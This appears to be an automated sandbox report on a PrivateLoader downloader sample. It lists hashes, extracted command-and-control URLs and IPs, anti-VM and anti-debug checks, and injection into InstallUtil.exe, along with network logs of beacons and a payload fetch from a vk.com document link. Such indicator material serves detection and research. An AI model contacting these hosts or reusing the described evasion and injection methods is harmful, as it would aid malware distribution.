Analysis
max time kernel: 139s
max time network: 149s
platform: windows10-2004_x64
resource: win10v2004-20220812-en
resource tags: arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
submitted: 03/01/2023, 12:25 UTC

Behavioral task: behavioral1
Sample: 044d2fde888aaa73c7a60076d4c93cb72d2c5f1ebfbdca29732ae85d0ba3fce9.exe
Resource: win7-20220812-en

General
Target: 044d2fde888aaa73c7a60076d4c93cb72d2c5f1ebfbdca29732ae85d0ba3fce9.exe
Size: 4.0MB
MD5: 3134fa9cea6fd7071133d85a5fb4f04e
SHA1: bc8428fa442bc143aaa444e98dae698f440abc3e
SHA256: 044d2fde888aaa73c7a60076d4c93cb72d2c5f1ebfbdca29732ae85d0ba3fce9
SHA512: e0d7e8f40bae193d484ef67342280c10c3223af3ebae7ae8285535435871e145e5a57c3e04944eb7d6df9688e7273e15066cb6748d26fd1015f4f820ae162be8
SSDEEP: 98304:706FB3Lep0AUPnz1GWObOOdbvUcPIPaatXQK2ApRE9Zea:7FL3Lk0AUPpGVbdbcyEtXWAzE9ka
Malware Config
Extracted: privateloader
http://91.241.19.125/pub.php?pub=one
http://sarfoods.com/index.php
208.67.104.60
-
payload_url
Signatures

PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.

Identifies VirtualBox via ACPI registry values (likely anti-VM) (2 TTPs, 1 IoC)
Key opened: \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ (044d2fde888aaa73c7a60076d4c93cb72d2c5f1ebfbdca29732ae85d0ba3fce9.exe)

Checks BIOS information in registry (2 TTPs, 2 IoCs)
BIOS information is often read in order to detect sandboxing environments.
Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion (044d2fde888aaa73c7a60076d4c93cb72d2c5f1ebfbdca29732ae85d0ba3fce9.exe)
Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion (044d2fde888aaa73c7a60076d4c93cb72d2c5f1ebfbdca29732ae85d0ba3fce9.exe)
yara_rule themida: behavioral2/memory/1376-134-0x0000000000A50000-0x0000000001612000-memory.dmp
yara_rule themida: behavioral2/memory/1376-143-0x0000000000A50000-0x0000000001612000-memory.dmp
Checks whether UAC is enabled
Key value queried: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA (044d2fde888aaa73c7a60076d4c93cb72d2c5f1ebfbdca29732ae85d0ba3fce9.exe)
Looks up external IP address via web service (2 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
flow 60: ipinfo.io
flow 61: ipinfo.io

Drops file in System32 directory (4 IoCs)
File opened for modification: C:\Windows\System32\GroupPolicy (InstallUtil.exe)
File opened for modification: C:\Windows\SysWOW64\GroupPolicy\gpt.ini (InstallUtil.exe)
File created: C:\Windows\System32\GroupPolicy\Machine\Registry.pol (InstallUtil.exe)
File opened for modification: C:\Windows\System32\GroupPolicy\GPT.INI (InstallUtil.exe)

Suspicious use of NtSetInformationThreadHideFromDebugger (1 IoC)
pid 1376: 044d2fde888aaa73c7a60076d4c93cb72d2c5f1ebfbdca29732ae85d0ba3fce9.exe

Suspicious use of SetThreadContext (1 IoC)
PID 1376 set thread context of 3796; process 044d2fde888aaa73c7a60076d4c93cb72d2c5f1ebfbdca29732ae85d0ba3fce9.exe; procid_target 87

Suspicious behavior: EnumeratesProcesses (8 IoCs)
pid 3796: InstallUtil.exe (8 identical entries)

Suspicious use of WriteProcessMemory (10 IoCs)
PID 1376 wrote to memory of 3796; process 044d2fde888aaa73c7a60076d4c93cb72d2c5f1ebfbdca29732ae85d0ba3fce9.exe; procid_target 87 (10 identical entries)
Processes

C:\Users\Admin\AppData\Local\Temp\044d2fde888aaa73c7a60076d4c93cb72d2c5f1ebfbdca29732ae85d0ba3fce9.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\044d2fde888aaa73c7a60076d4c93cb72d2c5f1ebfbdca29732ae85d0ba3fce9.exe"
  PID: 1376
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
      command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
      PID: 3796
      - Drops file in System32 directory
      - Suspicious behavior: EnumeratesProcesses

C:\Windows\system32\svchost.exe
  command line: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
  PID: 1464

C:\Windows\system32\svchost.exe
  command line: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
  PID: 1484
Network
-
Remote address: 8.8.8.8:53
Request: metazone1.com IN A
Response: metazone1.com IN A 31.31.196.244
-
Remote address: 31.31.196.244:80
Request:
GET /api/tracemap.php HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: metazone1.com
Response:
HTTP/1.1 403 Forbidden
Date: Tue, 03 Jan 2023 12:26:17 GMT
Content-Type: text/html
Content-Length: 201400
Connection: keep-alive
Vary: Accept-Encoding
ETag: "61cc0a19-312b8"
-
Remote address: 8.8.8.8:53
Request: meta-zone-1.ru IN A
Response: meta-zone-1.ru IN A 31.31.196.244
-
Remote address: 31.31.196.244:80
Request:
GET /api/tracemap.php HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: meta-zone-1.ru
Response:
HTTP/1.1 403 Forbidden
Date: Tue, 03 Jan 2023 12:26:18 GMT
Content-Type: text/html
Content-Length: 201400
Connection: keep-alive
Vary: Accept-Encoding
ETag: "61cc0a19-312b8"
-
Remote address: 8.8.8.8:53
Request: meta-zone-1.online IN A
Response: meta-zone-1.online IN A 31.31.196.244
-
Remote address: 31.31.196.244:80
Request:
GET /api/tracemap.php HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: meta-zone-1.online
Response:
HTTP/1.1 403 Forbidden
Date: Tue, 03 Jan 2023 12:26:18 GMT
Content-Type: text/html
Content-Length: 201400
Connection: keep-alive
Vary: Accept-Encoding
ETag: "61cc0a19-312b8"
-
Remote address: 208.67.104.60:80
Request:
GET /api/tracemap.php HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: 208.67.104.60
Response:
HTTP/1.1 200 OK
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
X-Powered-By: PHP/7.4.29
Content-Length: 15
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address: 208.67.104.60:80
Request:
POST /api/firegate.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Content-Length: 413
Host: 208.67.104.60
Response:
HTTP/1.1 200 OK
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
X-Powered-By: PHP/7.4.29
Content-Length: 0
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address: 208.67.104.60:80
Request:
POST /api/firegate.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Content-Length: 413
Host: 208.67.104.60
Response:
HTTP/1.1 200 OK
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
X-Powered-By: PHP/7.4.29
Content-Length: 0
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address: 208.67.104.60:80
Request:
POST /api/firegate.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Content-Length: 413
Host: 208.67.104.60
Response:
HTTP/1.1 200 OK
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
X-Powered-By: PHP/7.4.29
Content-Length: 0
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address: 208.67.104.60:80
Request:
POST /api/firegate.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Content-Length: 413
Host: 208.67.104.60
Response:
HTTP/1.1 200 OK
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
X-Powered-By: PHP/7.4.29
Content-Length: 0
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address: 208.67.104.60:80
Request:
POST /api/firegate.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Content-Length: 413
Host: 208.67.104.60
Response:
HTTP/1.1 200 OK
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
X-Powered-By: PHP/7.4.29
Content-Length: 0
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address: 208.67.104.60:80
Request:
POST /api/firegate.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Content-Length: 133
Host: 208.67.104.60
Response:
HTTP/1.1 200 OK
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
X-Powered-By: PHP/7.4.29
Content-Length: 0
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address: 208.67.104.60:80
Request:
POST /api/firegate.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Content-Length: 133
Host: 208.67.104.60
Response:
HTTP/1.1 200 OK
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
X-Powered-By: PHP/7.4.29
Content-Length: 0
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address: 208.67.104.60:80
Request:
POST /api/firegate.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Content-Length: 133
Host: 208.67.104.60
Response:
HTTP/1.1 200 OK
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
X-Powered-By: PHP/7.4.29
Content-Length: 0
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address: 208.67.104.60:80
Request:
POST /api/firegate.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Content-Length: 133
Host: 208.67.104.60
Response:
HTTP/1.1 200 OK
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
X-Powered-By: PHP/7.4.29
Content-Length: 0
Keep-Alive: timeout=5, max=91
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address: 208.67.104.60:80
Request:
POST /api/firegate.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Content-Length: 133
Host: 208.67.104.60
Response:
HTTP/1.1 200 OK
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
X-Powered-By: PHP/7.4.29
Content-Length: 0
Keep-Alive: timeout=5, max=90
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address: 208.67.104.60:80
Request:
POST /api/firegate.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Content-Length: 133
Host: 208.67.104.60
Response:
HTTP/1.1 200 OK
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
X-Powered-By: PHP/7.4.29
Content-Length: 0
Keep-Alive: timeout=5, max=89
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address: 208.67.104.60:80
Request:
POST /api/firegate.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Content-Length: 133
Host: 208.67.104.60
Response:
HTTP/1.1 200 OK
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
X-Powered-By: PHP/7.4.29
Content-Length: 0
Keep-Alive: timeout=5, max=88
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address: 208.67.104.60:80
Request:
POST /api/firegate.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Content-Length: 133
Host: 208.67.104.60
Response:
HTTP/1.1 200 OK
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
X-Powered-By: PHP/7.4.29
Content-Length: 0
Keep-Alive: timeout=5, max=87
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address: 208.67.104.60:80
Request:
POST /api/firegate.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Content-Length: 133
Host: 208.67.104.60
Response:
HTTP/1.1 200 OK
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
X-Powered-By: PHP/7.4.29
Content-Length: 0
Keep-Alive: timeout=5, max=86
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address: 208.67.104.60:80
Request:
POST /api/firegate.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Content-Length: 133
Host: 208.67.104.60
Response:
HTTP/1.1 200 OK
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
X-Powered-By: PHP/7.4.29
Content-Length: 0
Keep-Alive: timeout=5, max=85
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address: 8.8.8.8:53
Request: ipinfo.io IN A
Response: ipinfo.io IN A 34.117.59.81
-
Remote address: 34.117.59.81:443
Request:
GET /widget HTTP/1.1
Connection: Keep-Alive
Referer: https://ipinfo.io/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: ipinfo.io
Response:
HTTP/1.1 200 OK
x-frame-options: SAMEORIGIN
x-xss-protection: 1; mode=block
x-content-type-options: nosniff
referrer-policy: strict-origin-when-cross-origin
content-type: application/json; charset=utf-8
content-length: 912
date: Tue, 03 Jan 2023 12:26:19 GMT
x-envoy-upstream-service-time: 35
strict-transport-security: max-age=2592000; includeSubDomains
vary: Accept-Encoding
Via: 1.1 google
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
-
Remote address: 8.8.8.8:53
Request: vk.com IN A
Response:
vk.com IN A 87.240.137.164
vk.com IN A 87.240.129.133
vk.com IN A 87.240.132.72
vk.com IN A 87.240.132.67
vk.com IN A 87.240.132.78
vk.com IN A 93.186.225.194
-
URL: https://vk.com/doc746114504_647280747?hash=cvDFKP5q0CQEjBCbeoeHvPNrWE0xbMxZEmrkIeNKcET&dl=G42DMMJRGQ2TANA:1661413520:uZNj68vRUvQaydRD8wpAK8zluN0I7otw5AHbA1ZlN9T&api=1&no_preview=1
Process: InstallUtil.exe
Remote address: 87.240.137.164:443
Request:
GET /doc746114504_647280747?hash=cvDFKP5q0CQEjBCbeoeHvPNrWE0xbMxZEmrkIeNKcET&dl=G42DMMJRGQ2TANA:1661413520:uZNj68vRUvQaydRD8wpAK8zluN0I7otw5AHbA1ZlN9T&api=1&no_preview=1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: vk.com
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Date: Tue, 03 Jan 2023 12:26:22 GMT
Content-Type: text/html; charset=windows-1251
Content-Length: 139003
Connection: keep-alive
X-Powered-By: KPHP/7.4.113006
Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly
Set-Cookie: remixlang=3; expires=Mon, 08 Jan 2024 19:52:31 GMT; path=/; domain=.vk.com
Set-Cookie: remixstlid=9092856945242514274_TyUVALahm7RTRK4ZBUn3eTSSFWwg97pxXF61BoNGDZk; expires=Wed, 03 Jan 2024 12:26:22 GMT; path=/; domain=.vk.com; secure
Set-Cookie: remixstid=1407836848_epszTabxfTZZLDQZzcDu9R70qzgke0rzJmmgiRIz0EH; expires=Sat, 06 Jan 2024 01:28:54 GMT; path=/; domain=.vk.com; secure
Set-Cookie: remixlgck=e5ec174678d6eb2f90; expires=Sat, 06 Jan 2024 08:07:55 GMT; path=/; domain=.vk.com; secure; HttpOnly
Cache-control: no-store
X-Robots-Tag: noindex,nofollow
Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://*.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://*.yandex.ru https://*.google-analytics.com https://*.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://*.google.com https://google.com https://*.vkpartner.ru https://*.moatads.com https://*.adlooxtracking.ru https://*.serving-sys.ru https://*.weborama-tech.ru https://*.gstatic.com https://*.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://*.vk-cdn.net https://*.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://r.mradx.net https://ton.twimg.com https://tagmanager.google.com https://platform.twitter.com https://*.googleapis.com 'self' 'unsafe-inline';report-uri /csp
X-XSS-Protection: 1; report=/xss_reports
X-Frame-Options: deny
X-Frontend: front605107
Strict-Transport-Security: max-age=15768000
Access-Control-Expose-Headers: X-Frontend
-
Flows (columns: bytes sent, bytes received, packets sent, packets received)

31.31.196.244:80 (metazone1.com): 3.8kB, 207.7kB, 79, 151
  HTTP Request: GET http://metazone1.com/api/tracemap.php
  HTTP Response: 403

31.31.196.244:80 (meta-zone-1.ru): 3.8kB, 207.7kB, 79, 151
  HTTP Request: GET http://meta-zone-1.ru/api/tracemap.php
  HTTP Response: 403

31.31.196.244:80 (meta-zone-1.online): 3.9kB, 208.0kB, 80, 152
  HTTP Request: GET http://meta-zone-1.online/api/tracemap.php
  HTTP Response: 403

208.67.104.60:80: 9.9kB, 5.4kB, 49, 32
  HTTP Request: GET http://208.67.104.60/api/tracemap.php
  HTTP Response: 200
  HTTP Request: POST http://208.67.104.60/api/firegate.php (15 requests)
  HTTP Response: 200 (for each of the 15 requests)

34.117.59.81:443 (ipinfo.io): 923 B, 6.8kB, 9, 10
  HTTP Request: GET https://ipinfo.io/widget
  HTTP Response: 200

87.240.137.164:443 (vk.com), tls, http, InstallUtil.exe: 5.9kB, 150.1kB, 115, 113
  HTTP Request: GET https://vk.com/doc746114504_647280747?hash=cvDFKP5q0CQEjBCbeoeHvPNrWE0xbMxZEmrkIeNKcET&dl=G42DMMJRGQ2TANA:1661413520:uZNj68vRUvQaydRD8wpAK8zluN0I7otw5AHbA1ZlN9T&api=1&no_preview=1
  HTTP Response: 200

DNS flows (8.8.8.8:53)
  metazone1.com: 59 B, 75 B, 1, 1
    DNS Response: 31.31.196.244
  meta-zone-1.ru: 60 B, 76 B, 1, 1
    DNS Response: 31.31.196.244
  meta-zone-1.online: 64 B, 80 B, 1, 1
    DNS Response: 31.31.196.244
  ipinfo.io: 55 B, 71 B, 1, 1
    DNS Response: 34.117.59.81
  vk.com: 52 B, 148 B, 1, 1
    DNS Response: 87.240.137.164, 87.240.129.133, 87.240.132.72, 87.240.132.67, 87.240.132.78, 93.186.225.194